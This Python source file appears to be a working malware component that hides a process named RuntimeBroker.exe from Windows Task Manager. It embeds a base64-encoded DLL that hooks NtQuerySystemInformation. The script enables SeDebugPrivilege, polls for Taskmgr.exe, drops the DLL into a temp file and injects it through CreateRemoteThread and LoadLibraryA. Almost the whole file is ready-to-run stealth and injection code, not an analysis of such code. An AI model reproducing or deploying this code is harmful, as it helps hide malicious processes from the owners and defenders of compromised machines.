"""
process_hider.py - Hide RuntimeBroker.exe from Task Manager.
Injects a DLL into taskmgr.exe that hooks NtQuerySystemInformation.
"""
import base64
import ctypes
import ctypes.wintypes as wt
import logging
import os
import tempfile
import threading
import time

_log = logging.getLogger("cpdbg")

# fmt: off
# Pre-compiled hider.dll (5120 bytes, x64, GCC 15.1, no CRT)
_DLL_B64 = (
    "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v"
    "ZGUuDQ0KJAAAAAAAAABQRQAAZIYHAAAAAAAAAAAAAAAAAPAALiILAgIsAAYAAAAKAAAAAgAA4BAA"
    "AAAQAAAAAK8OAwAAAAAQAAAAAgAABAAAAAAAAAAFAAIAAAAAAACAAAAABAAAYcgAAAMAYAEAACAA"
    "AAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAAAGAAADIAAAAAcAAAyAAAAAAAAAAA"
    "AAAAADAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAASHAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAA"
    "AEAEAAAAEAAAAAYAAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAACAAAAAACAAAAACAAAACgAA"
    "AAAAAAAAAAAAAAAAQAAAQC5wZGF0YQAAGAAAAAAwAAAAAgAAAAwAAAAAAAAAAAAAAAAAAEAAAEAu"
    "eGRhdGEAABQAAAAAQAAAAAIAAAAOAAAAAAAAAAAAAAAAAABAAABALmJzcwAAAAAQAAAAAFAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAgAAAwC5lZGF0YQAAMgAAAABgAAAAAgAAABAAAAAAAAAAAAAAAAAA"
    "AEAAAEAuaWRhdGEAAMgAAAAAcAAAAAIAAAASAAAAAAAAAAAAAAAAAABAAABAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFdW"
    "U0iD7CCJzkiJ0/8V9j8AAInHg/4FD4W3AAAAhcAPha8AAABMi1NAMfZMjR3ODwAATYXSD4SQAAAA"
    "Dx9EAAAPt0M4ZoXAD4R+AAAAZtHoZoP4EXV1McDrImYPH0QAAIPBIGZBg/kZdwODwiBmOcp1WUiD"
    "wAJIg/gidCpBD7cMAkEPtxQDRI1Bv0SNSr9mQYP4GXbLZkGD+Rl2zmY5ynUqZoXSdcxIhfZ0CosD"
    "hcB0AgMGiQaLA4XAdBlIAcNMi1NATYXSD4V1////iwNIid6FwHXnifhIg8QgW15fw2aQSIPsWIXS"
    "D4S8AAAAg/oBD4WmAAAA/xVNXwAAMcn/FU1fAABJicFIhcAPhIwAAABmgThNWg+FgQAAAEhjQDxM"
    "AciBOFBFAAB1couQkAAAAIXSdGhMAcqLCoXJdF8PH0AAi0IMTAHIRA+2AEGD4N9BgPhOdTxED7ZA"
    "AUGD4N9BgPhUdS1ED7ZAAkGD4N9BgPhEdR5ED7ZAA0GD4N9BgPhMdQ8PtkAEg+DfPEwPhEEBAACL"
    "ShRIg8IUhcl1pbgBAAAASIPEWMMPHwCLBVI+AACFwHTpSIM9Tj4AAAB03zHJ/xWMXgAASInBSIXA"
    "dM9IY0A8i5QBkAAAAEgBykSLCkWFyXS5ZmYuDx+EAAAAAAAPHwCLQgxIAchED7YAQYPg30GA+E51"
    "Cw+2QAGD4N88VHQZRItKFEiDwhRFhcl11Ol6////Dx+AAAAAAEkByUmDOQAPhGb///+LQhBIAcFI"
    "jQW+/f//6y5mZi4PH4QAAAAAAGZmLg8fhAAAAAAAZg8fRAAASYPBCEiDwQhJgzkAD4Qp////SDsB"
    "delMjUwkTEiJTCQwuggAAABMixXLXQAATIlMJDhBuAQAAABMiVQkKEH/0kiLBWE9AABIi0wkMLoI"
    "AAAATItMJDhEi0QkTEiJAf9UJCjHBTQ9AAAAAAAA6cr+//+JyEwByEyLAE2FwA+Euf7//4tKEEwB"
    "yesrZmYuDx+EAAAAAABmZi4PH4QAAAAAAEyLQAhIg8AISIPBCE2FwA+Ehv7//02FwHjmTQHIQYB4"
    "Ak513EGAeAN0ddVBgHgEUXXOQYB4BXV1x0GAeAZldcBBgHgHcnW5QYB4CHl1skGAeAlTdatBgHgK"
    "eXWkQYB4C3N1nUGAeAx0dZZBgHgNZXWPQYB4Dm11iEGAeA9JdYFBgHgQbg+Fdv///0GAeBFmD4Vr"
    "////QYB4Em8PhWD///9IiwFMjUwkTEiJTCQwQbgEAAAATIsVnlwAAEyJTCQ4uggAAABIiQU9PAAA"
    "TIlUJChB/9JIi0wkMEiNBSH8//9Mi0wkOESLRCRMuggAAABIiQH/VCQoxwUBPAAAAQAAAOmX/f//"
    "kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkP8lMlwAAJCQ/yUiXAAAkJD/JRJcAACQkA8fhAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFIAdQBu"
    "AHQAaQBtAGUAQgByAG8AawBlAHIALgBlAHgAZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AABHQ0M6IChHTlUpIDE1LjEuMAAAAAAAAAAAAAAAAAAAAP//////////AAAAAAAAAAD/////////"
    "/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAN4Q"
    "AAAAQAAA4BAAAAQUAAAMQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBwQABzID"
    "MAJgAXABBAEABKIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAChgAAABAAAAAAAAAAAAAAAoYAAAKGAAAChgAABoaWRlci5kbGwAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKHAAAAAAAAAA"
    "AAAAuHAAAEhwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGhwAAAAAAAAhHAAAAAAAACYcAAAAAAAAAAA"
    "AAAAAAAAaHAAAAAAAACEcAAAAAAAAJhwAAAAAAAAAAAAAAAAAAAAAERpc2FibGVUaHJlYWRMaWJy"
    "YXJ5Q2FsbHMAAABHZXRNb2R1bGVIYW5kbGVBAAAAAFZpcnR1YWxQcm90ZWN0AAAAAABwAAAAcAAA"
    "AHAAAEtFUk5FTDMyLmRsbAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="
)
# fmt: on

# Win32
PROCESS_ALL_ACCESS = 0x1F0FFF
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_READWRITE = 0x04
MEM_RELEASE = 0x8000
TH32CS_SNAPPROCESS = 0x02
TOKEN_ADJUST_PRIVILEGES = 0x0020
TOKEN_QUERY = 0x0008
SE_PRIVILEGE_ENABLED = 0x00000002

kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)
advapi32 = ctypes.WinDLL('advapi32', use_last_error=True)


class PROCESSENTRY32(ctypes.Structure):
    _fields_ = [
        ("dwSize", wt.DWORD),
        ("cntUsage", wt.DWORD),
        ("th32ProcessID", wt.DWORD),
        ("th32DefaultHeapID", ctypes.POINTER(ctypes.c_ulong)),
        ("th32ModuleID", wt.DWORD),
        ("cntThreads", wt.DWORD),
        ("th32ParentProcessID", wt.DWORD),
        ("pcPriClassBase", ctypes.c_long),
        ("dwFlags", wt.DWORD),
        ("szExeFile", ctypes.c_char * 260),
    ]


class LUID(ctypes.Structure):
    _fields_ = [("LowPart", wt.DWORD), ("HighPart", wt.LONG)]


class LUID_AND_ATTRIBUTES(ctypes.Structure):
    _fields_ = [("Luid", LUID), ("Attributes", wt.DWORD)]


class TOKEN_PRIVILEGES(ctypes.Structure):
    _fields_ = [
        ("PrivilegeCount", wt.DWORD),
        ("Privileges", LUID_AND_ATTRIBUTES * 1),
    ]


def _enable_debug_privilege():
    """Enable SeDebugPrivilege — needed to inject into taskmgr.exe."""
    token = wt.HANDLE()
    ok = advapi32.OpenProcessToken(
        kernel32.GetCurrentProcess(),
        TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
        ctypes.byref(token))
    if not ok:
        _log.debug("HIDER: OpenProcessToken failed: %s", ctypes.get_last_error())
        return False

    luid = LUID()
    ok = advapi32.LookupPrivilegeValueW(None, "SeDebugPrivilege", ctypes.byref(luid))
    if not ok:
        kernel32.CloseHandle(token)
        _log.debug("HIDER: LookupPrivilegeValue failed: %s", ctypes.get_last_error())
        return False

    tp = TOKEN_PRIVILEGES()
    tp.PrivilegeCount = 1
    tp.Privileges[0].Luid = luid
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED

    ok = advapi32.AdjustTokenPrivileges(
        token, False, ctypes.byref(tp),
        ctypes.sizeof(tp), None, None)
    err = ctypes.get_last_error()
    kernel32.CloseHandle(token)

    if ok and err == 0:
        _log.debug("HIDER: SeDebugPrivilege enabled")
        return True
    _log.debug("HIDER: AdjustTokenPrivileges err=%s", err)
    return False


def _find_pids(name):
    pids = []
    snap = kernel32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
    if snap == -1:
        return pids
    pe = PROCESSENTRY32()
    pe.dwSize = ctypes.sizeof(PROCESSENTRY32)
    if kernel32.Process32First(snap, ctypes.byref(pe)):
        while True:
            try:
                pname = pe.szExeFile.decode('utf-8', errors='ignore').lower()
            except Exception:
                pname = ''
            if pname == name.lower():
                pids.append(pe.th32ProcessID)
            if not kernel32.Process32Next(snap, ctypes.byref(pe)):
                break
    kernel32.CloseHandle(snap)
    return pids


def _inject_dll(pid, dll_path):
    h = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, pid)
    if not h:
        _log.debug("HIDER: OpenProcess(%d) FAILED err=%s", pid, ctypes.get_last_error())
        return False

    dll_bytes = dll_path.encode('utf-8') + b'\x00'
    addr = kernel32.VirtualAllocEx(h, 0, len(dll_bytes),
                                   MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)
    if not addr:
        _log.debug("HIDER: VirtualAllocEx FAILED err=%s", ctypes.get_last_error())
        kernel32.CloseHandle(h)
        return False

    written = ctypes.c_size_t(0)
    ok = kernel32.WriteProcessMemory(h, addr, dll_bytes, len(dll_bytes),
                                     ctypes.byref(written))
    if not ok:
        _log.debug("HIDER: WriteProcessMemory FAILED err=%s", ctypes.get_last_error())
        kernel32.VirtualFreeEx(h, addr, 0, MEM_RELEASE)
        kernel32.CloseHandle(h)
        return False

    k32 = kernel32.GetModuleHandleA(b"kernel32.dll")
    ll = kernel32.GetProcAddress(k32, b"LoadLibraryA")
    if not ll:
        _log.debug("HIDER: GetProcAddress(LoadLibraryA) FAILED")
        kernel32.VirtualFreeEx(h, addr, 0, MEM_RELEASE)
        kernel32.CloseHandle(h)
        return False

    thread = kernel32.CreateRemoteThread(h, None, 0, ll, addr, 0, None)
    if thread:
        kernel32.WaitForSingleObject(thread, 5000)
        kernel32.CloseHandle(thread)
        kernel32.CloseHandle(h)
        _log.debug("HIDER: Injected into PID %d OK", pid)
        return True

    _log.debug("HIDER: CreateRemoteThread FAILED err=%s", ctypes.get_last_error())
    kernel32.CloseHandle(h)
    return False


class ProcessHider:
    """Monitors for Task Manager and injects hider DLL."""

    def __init__(self):
        self._dll_path = None
        self._injected_pids = set()
        self._running = False
        self._thread = None

    def start(self):
        if self._running:
            return

        # Enable SeDebugPrivilege first
        _enable_debug_privilege()

        # Write DLL to temp
        try:
            dll_data = base64.b64decode(_DLL_B64)
            fd, path = tempfile.mkstemp(suffix='.dll', prefix='rt_')
            os.write(fd, dll_data)
            os.close(fd)
            self._dll_path = path
            _log.debug("HIDER: DLL written to %s (%d bytes)", path, len(dll_data))
        except Exception as exc:
            _log.debug("HIDER: DLL write failed: %s", exc)
            return

        self._running = True
        self._thread = threading.Thread(target=self._monitor, daemon=True,
                                        name='hider')
        self._thread.start()

    def stop(self):
        self._running = False
        if self._dll_path:
            try:
                os.unlink(self._dll_path)
            except Exception:
                pass
            self._dll_path = None
        self._injected_pids.clear()

    def _monitor(self):
        while self._running:
            try:
                pids = _find_pids("Taskmgr.exe")
                self._injected_pids &= set(pids)
                for pid in pids:
                    if pid not in self._injected_pids:
                        _log.debug("HIDER: Found taskmgr PID=%d, injecting...", pid)
                        if _inject_dll(pid, self._dll_path):
                            self._injected_pids.add(pid)
            except Exception as exc:
                _log.debug("HIDER: Monitor error: %s", exc)
            time.sleep(3)
